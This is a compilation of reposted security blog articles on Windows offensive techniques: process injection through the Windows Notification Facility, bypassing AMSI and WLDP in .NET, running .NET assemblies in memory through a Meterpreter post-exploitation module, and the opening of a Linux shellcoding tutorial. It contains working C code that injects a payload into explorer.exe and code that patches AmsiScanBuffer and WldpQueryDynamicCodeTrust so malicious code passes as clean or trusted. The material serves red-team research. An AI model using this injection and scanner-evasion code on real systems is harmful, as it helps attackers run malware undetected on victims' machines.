Windows Process Injection : Windows Notification Facility

Original text by modexp

Introduction

At Blackhat 2018, Alex Ionescu and Gabrielle Viala presented Windows Notification Facility: Peeling the Onion of the Most Undocumented Kernel Attack Surface Yet. It’s an exceptional well-researched presentation that I recommend you watch first before reading this post. In it, they describe WNF in great detail; the functions, data structures, how to interact with it. If you don’t wish to watch the whole video, well, you’re missing out on a cool presentation, but you can always read the slides from their talk here. Gabrielle followed up with a another well-detailed post called Playing with the Windows Notification Facility (WNF) that is also required reading if you want to understand the internals of WNF. You can find some of their tools here which allow dumping information about state names and subscribing for events. As suggested in the presentation, WNF can be used for code redirection/process injection which is what I’ll describe here. wezmaster has demonstrated how to use WNF for persisting .NET payloads here.

Context Header

The table, user and name subscriptions all have a context header.

typedef struct _WNF_CONTEXT_HEADER {
    CSHORT                   NodeTypeCode;
    CSHORT                   NodeByteSize;
} WNF_CONTEXT_HEADER, *PWNF_CONTEXT_HEADER;

The NodeTypeCode field indicates the type of structure that will appear after the header. The following are some examples.

#define WNF_NODE_SUBSCRIPTION_TABLE  0x911
#define WNF_NODE_NAME_SUBSCRIPTION   0x912
#define WNF_NODE_SERIALIZATION_GROUP 0x913
#define WNF_NODE_USER_SUBSCRIPTION   0x914

For a target process, we scan all writeable areas of memory and attempt to read sizeof(WNF_SUBSCRIPTION_TABLE). For each successful read, the Header.NodeTypeCode is compared with WNF_NODE_SUBSCRIPTION_TABLE while the NodeByteSize is compared with sizeof(WNF_SUBSCRIPTION_TABLE). The type code and byte size are unique to WNF and can be used to locate WNF structures in memory provided no such similar structures exist.

UPDATEAdam suggested finding the address of WNF table via a function referencing it. You could also search pointers in the .data section or PEB.ProcessHeap. Each of these methods would likely be faster than searching all writeable areas of memory that includes stack memory.

Subscription Table

Created by NTDLL.dll!RtlpInitializeWnf and assigned type 0x911. Both NTDLL.dll!RtlRegisterForWnfMetaNotification and NTDLL.dll!RtlSubscribeWnfStateChangeNotification will create the table if one doesn’t already exist. You could hijack the callback function in TP_TIMER to redirect code, but since this post is about WNF, we need to look at the other structures.

typedef struct _WNF_SUBSCRIPTION_TABLE {
    WNF_CONTEXT_HEADER                Header;
    SRWLOCK                           NamesTableLock;
    LIST_ENTRY                        NamesTableEntry;
    LIST_ENTRY                        SerializationGroupListHead;
    SRWLOCK                           SerializationGroupLock;
    DWORD                             Unknown1[2];
    DWORD                             SubscribedEventSet;
    DWORD                             Unknown2[2];
    PTP_TIMER                         Timer;
    ULONG64                           TimerDueTime;
} WNF_SUBSCRIPTION_TABLE, *PWNF_SUBSCRIPTION_TABLE;

The main field we’re interested in is the NamesTableEntry that will point to a list of WNF_NAME_SUBSCRIPTION structures.

Serialization Group

Created by NTDLL.dll!RtlpCreateSerializationGroup and assigned type 0x913. Although not important for process injection, It’s here for reference since it wasn’t described in the presentation.

typedef struct _WNF_SERIALIZATION_GROUP {
    WNF_CONTEXT_HEADER                Header;
    ULONG                             GroupId;
    LIST_ENTRY                        SerializationGroupList;
    ULONG64                           SerializationGroupValue;
    ULONG64                           SerializationGroupMemberCount;
} WNF_SERIALIZATION_GROUP, *PWNF_SERIALIZATION_GROUP;

Name Subscription

Created by NTDLL.dll!RtlpCreateWnfNameSubscription and assigned type 0x912. When subscribing for notifications, an attempt will be made to locate an existing name subscription and simply insert a user subscription into the SubscriptionsList using NTDLL.dll!RtlpAddWnfUserSubToNameSub.

typedef struct _WNF_NAME_SUBSCRIPTION {
    WNF_CONTEXT_HEADER                Header;
    ULONG64                           SubscriptionId;
    WNF_STATE_NAME_INTERNAL           StateName;
    WNF_CHANGE_STAMP                  CurrentChangeStamp;
    LIST_ENTRY                        NamesTableEntry;
    PWNF_TYPE_ID                      TypeId;
    SRWLOCK                           SubscriptionLock;
    LIST_ENTRY                        SubscriptionsListHead;
    ULONG                             NormalDeliverySubscriptions;
    ULONG                             NotificationTypeCount[5];
    PWNF_DELIVERY_DESCRIPTOR          RetryDescriptor;
    ULONG                             DeliveryState;
    ULONG64                           ReliableRetryTime;
} WNF_NAME_SUBSCRIPTION, *PWNF_NAME_SUBSCRIPTION;

The main fields we’re interested in are NamesTableEntry and SubscriptionsListHead for each user subscription that is described next.

User Subscription

Created by NTDLL.dll!RtlpCreateWnfUserSubscription and assigned type 0x914. This is the main structure one would want to modify for process injection or code redirection.

typedef struct _WNF_USER_SUBSCRIPTION {
    WNF_CONTEXT_HEADER                Header;
    LIST_ENTRY                        SubscriptionsListEntry;
    PWNF_NAME_SUBSCRIPTION            NameSubscription;
    PWNF_USER_CALLBACK                Callback;
    PVOID                             CallbackContext;
    ULONG64                           SubProcessTag;
    ULONG                             CurrentChangeStamp;
    ULONG                             DeliveryOptions;
    ULONG                             SubscribedEventSet;
    PWNF_SERIALIZATION_GROUP          SerializationGroup;
    ULONG                             UserSubscriptionCount;
    ULONG64                           Unknown[10];
} WNF_USER_SUBSCRIPTION, *PWNF_USER_SUBSCRIPTION;

We’re interested in the Callback and CallbackContext fields. If the context pointed to a virtual function table and one of the methods was executed upon receiving a notification from the kernel, then it probably wouldn’t require modifying Callback at all. To make things easier, the PoC only modifies the Callback value.

Callback Prototype

Six parameters are passed to a callback procedure. Both Buffer and CallbackContext could be utilized to pass in arbitrary code or commands, but since the PoC only executes notepad.exe, the parameters are ignored. That being said, it’s still important to use the same prototype for a payload so that the parameters are safely removed from the stack before returning to the caller.

typedef NTSTATUS (*PWNF_USER_CALLBACK) (
    _In_     WNF_STATE_NAME   StateName,
    _In_     WNF_CHANGE_STAMP ChangeStamp,
    _In_opt_ PWNF_TYPE_ID     TypeId,
    _In_opt_ PVOID            CallbackContext,
    _In_     PVOID            Buffer,
    _In_     ULONG            BufferSize);

Listing Subscriptions

To help locate the WNF subscription table in a remote process, I wrote a simple tool called wnfscan that searches all writeable areas of memory for the context header. Once found, it parses and displays a list of name and user subscriptions.

Process Injection

Because we have to locate the WNF subscription table by scanning memory, this method of injection is more complicated than others. We don’t search for WNF_USER_SUBSCRIPTIONstructures because they appear higher up in memory and take too long to find. Scanning for the table first is much faster since it’s usually created when the process starts thus appearing lower in memory. Once the table is found, the name subscriptions are read and a user subscription is returned.

VOID wnf_inject(LPVOID payload, DWORD payloadSize) {
    WNF_USER_SUBSCRIPTION  us;
    LPVOID                 sa, cs;
    HWND                   hw;
    HANDLE                 hp;
    DWORD                  pid;
    SIZE_T                 wr;
    ULONG64                ns = WNF_SHEL_APPLICATION_STARTED;
    NtUpdateWnfStateData_t _NtUpdateWnfStateData;
    HMODULE                m;
      
    // 1. Open explorer.exe
    hw = FindWindow(L"Shell_TrayWnd", NULL);
    GetWindowThreadProcessId(hw, &pid);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    
    // 2. Locate user subscription
    sa = GetUserSubFromProcess(hp, &us, WNF_SHEL_APPLICATION_STARTED);

    // 3. Allocate RWX memory and write payload
    cs = VirtualAllocEx(hp, NULL, payloadSize,
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 4. Update callback and trigger execution of payload
    WriteProcessMemory(
      hp, 
      (PBYTE)sa + offsetof(WNF_USER_SUBSCRIPTION, Callback), 
      &cs,
      sizeof(ULONG_PTR),
      &wr);
      
    m = GetModuleHandle(L"ntdll");
    _NtUpdateWnfStateData = 
      (NtUpdateWnfStateData_t)GetProcAddress(m, "NtUpdateWnfStateData");
      
    _NtUpdateWnfStateData(
      &ns, NULL, 0, 0, NULL, 0, 0);
      
    // 5. Restore original callback, free memory and close process
    WriteProcessMemory(
      hp, 
      (PBYTE)sa + offsetof(WNF_USER_SUBSCRIPTION, Callback), 
      &us.Callback,
      sizeof(ULONG_PTR),
      &wr);
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}

Summary

Since it’s possible to transfer data into the address space of a remote process via WNF publishing, it may be possible to avoid using VirtualAllocEx and WriteProcessMemory. Some .NET processes allocate executable memory with write permissions that could be misused by an external process for code injection. A PoC that executes notepad can be found here.

Реклама

How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code

Original text by modexp

1. Introduction

v4.8 of the dotnet framework uses Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP) to block potentially unwanted software running from memory. WLDP will verify the digital signature of dynamic code while AMSI will scan for software that is either harmful or blocked by the administrator. This post documents three publicly-known methods red teams currently use to bypass AMSI and one to bypass WLDP. The bypass methods described are somewhat generic and don’t require special knowledge of AMSI or WLDP. If you’re reading this post anytime after June 2019, the methods may no longer work. The research of AMSI and WLDP was conducted in collaboration with TheWover.

2. Previous Research

The following table includes links to past research about AMSI and WLDP. If you feel I’ve missed anyone, don’t hesitate to e-mail me the details.

DateArticle
May 2016Bypassing Amsi using PowerShell 5 DLL Hijacking by Cneelis
Jul 2017Bypassing AMSI via COM Server Hijacking by Matt Nelson
Jul 2017Bypassing Device Guard with .NET Assembly Compilation Methods by Matt Graeber
Feb 2018AMSI Bypass With a Null Character by Satoshi Tanda
Feb 2018AMSI Bypass: Patching Technique by CyberArk (Avi Gimpel and Zeev Ben Porat).
Feb 2018The Rise and Fall of AMSI by Tal Liberman (Ensilo).
May 2018AMSI Bypass Redux by Avi Gimpel (CyberArk).
Jun 2018Exploring PowerShell AMSI and Logging Evasion by Adam Chester
Jun 2018Disabling AMSI in JScript with One Simple Trick by James Forshaw
Jun 2018Documenting and Attacking a Windows Defender Application Control Feature the Hard Way – A Case Study in Security Research Methodology by Matt Graeber
Oct 2018How to bypass AMSI and execute ANY malicious Powershell code by Andre Marques
Oct 2018AmsiScanBuffer Bypass Part 1Part 2Part 3Part 4 by Rasta Mouse
Dec 2018PoC function to corrupt the g_amsiContext global variable in clr.dll by Matt Graeber
Apr 2019Bypassing AMSI for VBA by Pieter Ceelen (Outflank)

3. AMSI Example in C

Given the path to a file, the following function will open it, map into memory and use AMSI to detect if the contents are harmful or blocked by the administrator.

typedef HRESULT (WINAPI *AmsiInitialize_t)(
  LPCWSTR      appName,
  HAMSICONTEXT *amsiContext);

typedef HRESULT (WINAPI *AmsiScanBuffer_t)(
  HAMSICONTEXT amsiContext,
  PVOID        buffer,
  ULONG        length,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *result);

typedef void (WINAPI *AmsiUninitialize_t)(
  HAMSICONTEXT amsiContext);
  
BOOL IsMalware(const char *path) {
    AmsiInitialize_t   _AmsiInitialize;
    AmsiScanBuffer_t   _AmsiScanBuffer;
    AmsiUninitialize_t _AmsiUninitialize;
    HAMSICONTEXT       ctx;
    AMSI_RESULT        res;
    HMODULE            amsi;
    
    HANDLE             file, map, mem;
    HRESULT            hr = -1;
    DWORD              size, high;
    BOOL               malware = FALSE;
    
    // load amsi library
    amsi = LoadLibrary("amsi");
    
    // resolve functions
    _AmsiInitialize = 
      (AmsiInitialize_t)
      GetProcAddress(amsi, "AmsiInitialize");
    
    _AmsiScanBuffer =
      (AmsiScanBuffer_t)
      GetProcAddress(amsi, "AmsiScanBuffer");
      
    _AmsiUninitialize = 
      (AmsiUninitialize_t)
      GetProcAddress(amsi, "AmsiUninitialize");
      
    // return FALSE on failure
    if(_AmsiInitialize   == NULL ||
       _AmsiScanBuffer   == NULL ||
       _AmsiUninitialize == NULL) {
      printf("Unable to resolve AMSI functions.\n");
      return FALSE;
    }
    
    // open file for reading
    file = CreateFile(
      path, GENERIC_READ, FILE_SHARE_READ,
      NULL, OPEN_EXISTING, 
      FILE_ATTRIBUTE_NORMAL, NULL); 
    
    if(file != INVALID_HANDLE_VALUE) {
      // get size
      size = GetFileSize(file, &high);
      if(size != 0) {
        // create mapping
        map = CreateFileMapping(
          file, NULL, PAGE_READONLY, 0, 0, 0);
          
        if(map != NULL) {
          // get pointer to memory
          mem = MapViewOfFile(
            map, FILE_MAP_READ, 0, 0, 0);
            
          if(mem != NULL) {
            // scan for malware
            hr = _AmsiInitialize(L"AMSI Example", &ctx);
            if(hr == S_OK) {
              hr = _AmsiScanBuffer(ctx, mem, size, NULL, 0, &res);
              if(hr == S_OK) {
                malware = (AmsiResultIsMalware(res) || 
                           AmsiResultIsBlockedByAdmin(res));
              }
              _AmsiUninitialize(ctx);
            }              
            UnmapViewOfFile(mem);
          }
          CloseHandle(map);
        }
      }
      CloseHandle(file);
    }
    return malware;
}

Scanning a good and bad file.

If you’re already familiar with the internals of AMSI, you can skip to the bypass methods here.

4. AMSI Context

The context is an undocumented structure, but you may use the following to interpret the handle returned.

typedef struct tagHAMSICONTEXT {
  DWORD        Signature;          // "AMSI" or 0x49534D41
  PWCHAR       AppName;            // set by AmsiInitialize
  IAntimalware *Antimalware;       // set by AmsiInitialize
  DWORD        SessionCount;       // increased by AmsiOpenSession
} _HAMSICONTEXT, *_PHAMSICONTEXT;

5. AMSI Initialization

appName points to a user-defined string in unicode format while amsiContext points to a handle of type HAMSICONTEXT. It returns S_OK if an AMSI context was successfully initialized. The following code is not a full implementation of the function, but should help you understand what happens internally.

HRESULT _AmsiInitialize(LPCWSTR appName, HAMSICONTEXT *amsiContext) {
    _HAMSICONTEXT *ctx;
    HRESULT       hr;
    int           nameLen;
    IClassFactory *clsFactory = NULL;
    
    // invalid arguments?
    if(appName == NULL || amsiContext == NULL) {
      return E_INVALIDARG;
    }
    
    // allocate memory for context
    ctx = (_HAMSICONTEXT*)CoTaskMemAlloc(sizeof(_HAMSICONTEXT));
    if(ctx == NULL) {
      return E_OUTOFMEMORY;
    }
    
    // initialize to zero
    ZeroMemory(ctx, sizeof(_HAMSICONTEXT));
    
    // set the signature to "AMSI"
    ctx->Signature = 0x49534D41;
    
    // allocate memory for the appName and copy to buffer
    nameLen = (lstrlen(appName) + 1) * sizeof(WCHAR);
    ctx->AppName = (PWCHAR)CoTaskMemAlloc(nameLen);
    
    if(ctx->AppName == NULL) {
      hr = E_OUTOFMEMORY;
    } else {
      // set the app name
      lstrcpy(ctx->AppName, appName);
      
      // instantiate class factory
      hr = DllGetClassObject(
        CLSID_Antimalware, 
        IID_IClassFactory, 
        (LPVOID*)&clsFactory);
        
      if(hr == S_OK) {
        // instantiate Antimalware interface
        hr = clsFactory->CreateInstance(
          NULL,
          IID_IAntimalware, 
          (LPVOID*)&ctx->Antimalware);
        
        // free class factory
        clsFactory->Release();
        
        // save pointer to context
        *amsiContext = ctx;
      }
    }
    
    // if anything failed, free context
    if(hr != S_OK) {
      AmsiFreeContext(ctx);
    }
    return hr;
}

Memory is allocated on the heap for a HAMSICONTEXT structure and initialized using the appName, the AMSI signature (0x49534D41) and IAntimalware interface.

6. AMSI Scanning

The following code gives you a rough idea of what happens when the function is invoked. If the scan is successful, the result returned will be S_OK and the AMSI_RESULT should be inspected to determine if the buffer contains unwanted software.

HRESULT _AmsiScanBuffer(
  HAMSICONTEXT amsiContext,
  PVOID        buffer,
  ULONG        length,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *result)
{
    _HAMSICONTEXT *ctx = (_HAMSICONTEXT*)amsiContext;
    
    // validate arguments
    if(buffer           == NULL       ||
       length           == 0          ||
       amsiResult       == NULL       ||
       ctx              == NULL       ||
       ctx->Signature   != 0x49534D41 ||
       ctx->AppName     == NULL       ||
       ctx->Antimalware == NULL)
    {
      return E_INVALIDARG;
    }
    
    // scan buffer
    return ctx->Antimalware->Scan(
      ctx->Antimalware,     // rcx = this
      &CAmsiBufferStream,   // rdx = IAmsiBufferStream interface
      amsiResult,           // r8  = AMSI_RESULT
      NULL,                 // r9  = IAntimalwareProvider
      amsiContext,          // HAMSICONTEXT
      CAmsiBufferStream,
      buffer,
      length, 
      contentName,
      amsiSession);
}

Note how arguments are validated. This is one of the many ways AmsiScanBuffer can be forced to fail and return E_INVALIDARG.

7. CLR Implementation of AMSI

CLR uses a private function called AmsiScan to detect unwanted software passed via a Loadmethod. Detection can result in termination of a .NET process, but not necessarily an unmanaged process using the CLR hosting interfaces. The following code gives you a rough idea of how CLR implements AMSI.

AmsiScanBuffer_t _AmsiScanBuffer;
AmsiInitialize_t _AmsiInitialize;
HAMSICONTEXT     *g_amsiContext;

VOID AmsiScan(PVOID buffer, ULONG length) {
    HMODULE          amsi;
    HAMSICONTEXT     *ctx;
    HAMSI_RESULT     amsiResult;
    HRESULT          hr;
    
    // if global context not initialized
    if(g_amsiContext == NULL) {
      // load AMSI.dll
      amsi = LoadLibraryEx(
        L"amsi.dll", 
        NULL, 
        LOAD_LIBRARY_SEARCH_SYSTEM32);
        
      if(amsi != NULL) {
        // resolve address of init function
        _AmsiInitialize = 
          (AmsiInitialize_t)GetProcAddress(amsi, "AmsiInitialize");
        
        // resolve address of scanning function
        _AmsiScanBuffer =
          (AmsiScanBuffer_t)GetProcAddress(amsi, "AmsiScanBuffer");
        
        // failed to resolve either? exit scan
        if(_AmsiInitialize == NULL ||
           _AmsiScanBuffer == NULL) return;
           
        hr = _AmsiInitialize(L"DotNet", &ctx);
        
        if(hr == S_OK) {
          // update global variable
          g_amsiContext = ctx;
        }
      }
    }
    if(g_amsiContext != NULL) {
      // scan buffer
      hr = _AmsiScanBuffer(
        g_amsiContext,
        buffer,
        length,
        0,
        0,        
        &amsiResult);
        
      if(hr == S_OK) {
        // if malware was detected or it's blocked by admin
        if(AmsiResultIsMalware(amsiResult) ||
           AmsiResultIsBlockedByAdmin(amsiResult))
        {
          // "Operation did not complete successfully because "
          // "the file contains a virus or potentially unwanted" 
          // software.
          GetHRMsg(ERROR_VIRUS_INFECTED, &error_string, 0);
          ThrowHR(COR_E_BADIMAGEFORMAT, &error_string);          
        }           
      }
    }
}

When AmsiScan is called for the first time, it invokes AmsiInitialize, and if successful will return a pointer to an AMSI context. The pointer is then saved to a global variable called g_amsiContext to be used for later scans. If buffer does contain harmful code, ThrowHR is called with COR_E_BADIMAGEFORMAT and ERROR_VIRUS_INFECTED as the secondary error. The problem with this code is that AmsiScanBuffer will return E_INVALIDARG if the AMSI context is corrupt and the fact AmsiScan doesn’t bother to investigate why.

8. AMSI Bypass A (Patching Data)

Matt Graeber provided a PoC that corrupts the context CLR!g_amsiContext points to, thus causing AmsiScanBuffer to return E_INVALIDARG. As you can see from the CLR implementation, this works because the result of CLR!AmsiScan is never validated for success or failure. The assumption is that it will simply throw an error and terminate the host application upon any attempt to load unwanted software. However, an unmanaged application hosting a .NET assembly is likely to handle any C++ exception. Windows Defender would still log the detection of harmful code, but the unmanaged host application would in some cases continue to run. To disable AMSI via g_amsiContext, one can either search through the heap memory pointed to by PEB.ProcessHeap or through each pointer found in the virtual address space of the .data segment. The following code demonstrates the latter approach. This only works _after_ CLR has called AmsiScan.

BOOL DisableAMSI(VOID) {
    LPVOID                   hCLR;
    BOOL                     disabled = FALSE;
    PIMAGE_DOS_HEADER        dos;
    PIMAGE_NT_HEADERS        nt;
    PIMAGE_SECTION_HEADER    sh;
    DWORD                    i, j, res;
    PBYTE                    ds;
    MEMORY_BASIC_INFORMATION mbi;
    _PHAMSICONTEXT           ctx;
    
    hCLR = GetModuleHandleA("CLR");
    
    if(hCLR != NULL) {
      dos = (PIMAGE_DOS_HEADER)hCLR;  
      nt  = RVA2VA(PIMAGE_NT_HEADERS, hCLR, dos->e_lfanew);  
      sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
             nt->FileHeader.SizeOfOptionalHeader);
             
      // scan all writeable segments while disabled == FALSE
      for(i = 0; 
          i < nt->FileHeader.NumberOfSections && !disabled; 
          i++) 
      {
        // if this section is writeable, assume it's data
        if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
          // scan section for pointers to the heap
          ds = RVA2VA (PBYTE, hCLR, sh[i].VirtualAddress);
           
          for(j = 0; 
              j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR); 
              j += sizeof(ULONG_PTR)) 
          {
            // get pointer
            ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
            // query if the pointer
            res = VirtualQuery((LPVOID)ptr, &mbi, sizeof(mbi));
            if(res != sizeof(mbi)) continue;
            
            // if it's a pointer to heap or stack
            if ((mbi.State   == MEM_COMMIT    ) &&
                (mbi.Type    == MEM_PRIVATE   ) && 
                (mbi.Protect == PAGE_READWRITE))
            {
              ctx = (_PHAMSICONTEXT)ptr;
              // check if it contains the signature 
              if(ctx->Signature == 0x49534D41) {
                // corrupt it
                ctx->Signature++;
                disabled = TRUE;
                break;
              }
            }
          }
        }
      }
    }
    return disabled;
}

9. AMSI Bypass B (Patching Code 1)

CyberArk suggest patching AmsiScanBuffer with 2 instructions xor edi, edi, nop. If you wanted to hook the function, using a Length Disassembler Engine (LDE) might be helpful for calculating the correct number of prolog bytes to save before overwriting with a jump to alternate function. Since the AMSI context passed into this function is validated and one of the tests require the Signature to be “AMSI”, you might locate that immediate value and simply change it to something else. In the following example, we’re corrupting the signature in code rather than context/data as demonstrated by Matt Graeber.

BOOL DisableAMSI(VOID) {
    HMODULE        dll;
    PBYTE          cs;
    DWORD          i, op, t;
    BOOL           disabled = FALSE;
    _PHAMSICONTEXT ctx;
    
    // load AMSI library
    dll = LoadLibraryExA(
      "amsi", NULL, 
      LOAD_LIBRARY_SEARCH_SYSTEM32);
      
    if(dll == NULL) {
      return FALSE;
    }
    // resolve address of function to patch
    cs = (PBYTE)GetProcAddress(dll, "AmsiScanBuffer");
    
    // scan for signature
    for(i=0;;i++) {
      ctx = (_PHAMSICONTEXT)&cs[i];
      // is it "AMSI"?
      if(ctx->Signature == 0x49534D41) {
        // set page protection for write access
        VirtualProtect(cs, sizeof(ULONG_PTR), 
          PAGE_EXECUTE_READWRITE, &op);
          
        // change signature
        ctx->Signature++;
        
        // set page back to original protection
        VirtualProtect(cs, sizeof(ULONG_PTR), op, &t);
        disabled = TRUE;
        break;
      }
    }
    return disabled;
}

10. AMSI Bypass C (Patching Code 2)

Tal Liberman suggests overwriting the prolog bytes of AmsiScanBuffer to return 1. The following code also overwrites that function so that it returns AMSI_RESULT_CLEAN and S_OKfor every buffer scanned by CLR.

// fake function that always returns S_OK and AMSI_RESULT_CLEAN
static HRESULT AmsiScanBufferStub(
  HAMSICONTEXT amsiContext,
  PVOID        buffer,
  ULONG        length,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *result)
{
    *result = AMSI_RESULT_CLEAN;
    return S_OK;
}

static VOID AmsiScanBufferStubEnd(VOID) {}

BOOL DisableAMSI(VOID) {
    BOOL    disabled = FALSE;
    HMODULE amsi;
    DWORD   len, op, t;
    LPVOID  cs;
    
    // load amsi
    amsi = LoadLibrary("amsi");
    
    if(amsi != NULL) {
      // resolve address of function to patch
      cs = GetProcAddress(amsi, "AmsiScanBuffer");
      
      if(cs != NULL) {
        // calculate length of stub
        len = (ULONG_PTR)AmsiScanBufferStubEnd -
          (ULONG_PTR)AmsiScanBufferStub;
          
        // make the memory writeable
        if(VirtualProtect(
          cs, len, PAGE_EXECUTE_READWRITE, &op))
        {
          // over write with code stub
          memcpy(cs, &AmsiScanBufferStub, len);
          
          disabled = TRUE;
            
          // set back to original protection
          VirtualProtect(cs, len, op, &t);
        }
      }
    }
    return disabled;
}

After the patch is applied, we see unwanted software is flagged as safe.

11. WLDP Example in C

The following function demonstrates how to query the trust of dynamic code in-memory using Windows Lockdown Policy.

BOOL VerifyCodeTrust(const char *path) {
    WldpQueryDynamicCodeTrust_t _WldpQueryDynamicCodeTrust;
    HMODULE                     wldp;
    HANDLE                      file, map, mem;
    HRESULT                     hr = -1;
    DWORD                       low, high;
    
    // load wldp
    wldp = LoadLibrary("wldp");
    _WldpQueryDynamicCodeTrust = 
      (WldpQueryDynamicCodeTrust_t)
      GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
    
    // return FALSE on failure
    if(_WldpQueryDynamicCodeTrust == NULL) {
      printf("Unable to resolve address for WLDP.dll!WldpQueryDynamicCodeTrust.\n");
      return FALSE;
    }
    
    // open file reading
    file = CreateFile(
      path, GENERIC_READ, FILE_SHARE_READ,
      NULL, OPEN_EXISTING, 
      FILE_ATTRIBUTE_NORMAL, NULL); 
    
    if(file != INVALID_HANDLE_VALUE) {
      // get size
      low = GetFileSize(file, &high);
      if(low != 0) {
        // create mapping
        map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, 0);
        if(map != NULL) {
          // get pointer to memory
          mem = MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
          if(mem != NULL) {
            // verify signature
            hr = _WldpQueryDynamicCodeTrust(0, mem, low);              
            UnmapViewOfFile(mem);
          }
          CloseHandle(map);
        }
      }
      CloseHandle(file);
    }
    return hr == S_OK;
}

12. WLDP Bypass A (Patching Code 1)

Overwriting the function with a code stub that always returns S_OK.

// fake function that always returns S_OK
static HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
    HANDLE fileHandle,
    PVOID  baseImage,
    ULONG  ImageSize)
{
    return S_OK;
}

static VOID WldpQueryDynamicCodeTrustStubEnd(VOID) {}

static BOOL PatchWldp(VOID) {
    BOOL    patched = FALSE;
    HMODULE wldp;
    DWORD   len, op, t;
    LPVOID  cs;
    
    // load wldp
    wldp = LoadLibrary("wldp");
    
    if(wldp != NULL) {
      // resolve address of function to patch
      cs = GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
      
      if(cs != NULL) {
        // calculate length of stub
        len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
          (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
          
        // make the memory writeable
        if(VirtualProtect(
          cs, len, PAGE_EXECUTE_READWRITE, &op))
        {
          // over write with stub
          memcpy(cs, &WldpQueryDynamicCodeTrustStub, len);
        
          patched = TRUE;
        
          // set back to original protection
          VirtualProtect(cs, len, op, &t);
        }
      }
    }
    return patched;
}

Although the methods described here are easy to detect, they remain effective against the latest release of DotNet framework on Windows 10. So long as it’s possible to patch data or code used by AMSI to detect harmful code, the potential to bypass it will always exist.

Execute assembly via Meterpreter session

( Original text by B4rtik )

Backgroud

Windows to run a PE file relies on reading the header. The PE header describes how it should be loaded in memory, which dependencies has and where is the entry point.
And what about .Net Assembly? The entry point is somewhere in the IL code. Direct execution of the assembly using the entry points in the intermediate code would cause an error.
This is because the intermediate code should not be executed first but the runtime will load the intermediate code and execute it.

Hosting CLR

In previous versions of Windows, execution is passed to an entry point where the boot code is located. The startup code, is a native code and uses an unmanaged CLR API to start the .NET runtime within the current process and launch the real program that is the IL code. This could be a good strategy to achieve the result. The final aim is: to run the assemply directly in memory, then the dll must have the assembly some where in memory, any command line parameters and a reference to the memory area that contains them.

Execute Assembly

So I need to create a post-exploitation module that performs the following steps:

  1. Spawn a process to host CLR (meterpreter)
  2. Reflectively Load HostCLR dll (meterpreter)
  3. Copy the assembly into the spawned process memory area (meterpreter)
  4. Copy the parameters into the spawned process memory area (meterpreter)
  5. Read assembly and parameters (dll)
  6. Execute the assembly (dll)

To start the Host process, metasploit provides Process.execute which has the following signature:

Process.execute (path, arguments = nil, opts = nil)

The interesting part is the ops parameter:

  1. Hidden
  2. Channelized
  3. Suspended
  4. InMemory

By setting Channelized to true, I can read the assembly output for free with the call

notepad_process.channel.read

Once the Host process is created, Metasploit provides some functions for interacting with the memory of a remote process:

  1. inject_dll_into_process
  2. memory.allocate
  3. memory.write

The inject_dll_into_process function copies binary passed as an argument to a read-write-exec memory area and returns its address and an offset of the dll’s entry point.

exploit_mem, offset = inject_dll_into_process (process, library_path)

The memory.allocate function allocates memory by setting the required protection mode. In this case
I will write the parameters and the assembly in the allocated memory area, for none of these two elements I need the memory to be executable so I will set RW.

I decided to organize the memory area dedicated to parameters and assemblies as follows:

1024 bytes for the parameters
1M for the assembly

assembly_mem = process.memory.allocate (1025024, PAGE_READWRITE)

The third method allows to write data to a specified memory address.

process.memory.write (assembly_mem, params + File.read (exe_path))

Now I have the memory address of dll, the offset to the entry point, the memory address fo both the parameters and the assembly to be executed.
Considering the function

Thread.create (entry, parameter = nil, suspended = false)

I can use the memory address of dll plus the offset as a value for the entry parameter and the address the parameter and assembly memory area as the parameter parameter value.

process.thread.create (exploit_mem + offset, assembly_mem)

This results in a call to the entry point and an LPVOID pointer as input parameter.

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)

It’s all I need to recover the parameters to be passed to the assembly and the assembly itself.

ReadProcessMemory(GetCurrentProcess(), lpPayload, allData, RAW_ASSEMBLY_LENGTH + RAW_AGRS_LENGTH, &readed);

About the assemblies to be executed, it is important to note that the signature of the Main method must match with the parameters that have been set in the module, for example:

If the property ARGUMENTS is set to «antani sblinda destra» the main method should be «static void main (string [] args)»
If the property ARGUMENTS is set to «» the main method should be «static void main ()»

Chaining with SharpGen

A few days ago I read a blog post from @cobb_io where he presented an interesting tool for inline compilation of .net assemblies. By default execute-assembly module looks for assemblies in $(metasploit-framework-home)/data/execute-assembly but it is also possible to change this behavior by setting the property ASSEMBLYPATH for example by pointing it to the SharpGen Output folder in this way I can compile the assemblies and execute them directly with the module.

Source code

https://github.com/b4rtik/metasploit-execute-assembly

Linux Buffer Overflows x86 – Part 3 (Shellcoding)

( Original text by SubZero0x9 )

Hello guys, this is the part 3 of the Linux buffer Overflows x86. In this part we will learn what is shellcode, why do we use it and how do we use it. In the previous two blogs, we learnt about process memory, stack region, stack operations, stack registers, attempting buffer overflow, overwriting buffer, modifying return address, manipulating program flow and program execution.
If you have not read the first two blogs, here are the links Part1 and Part2.

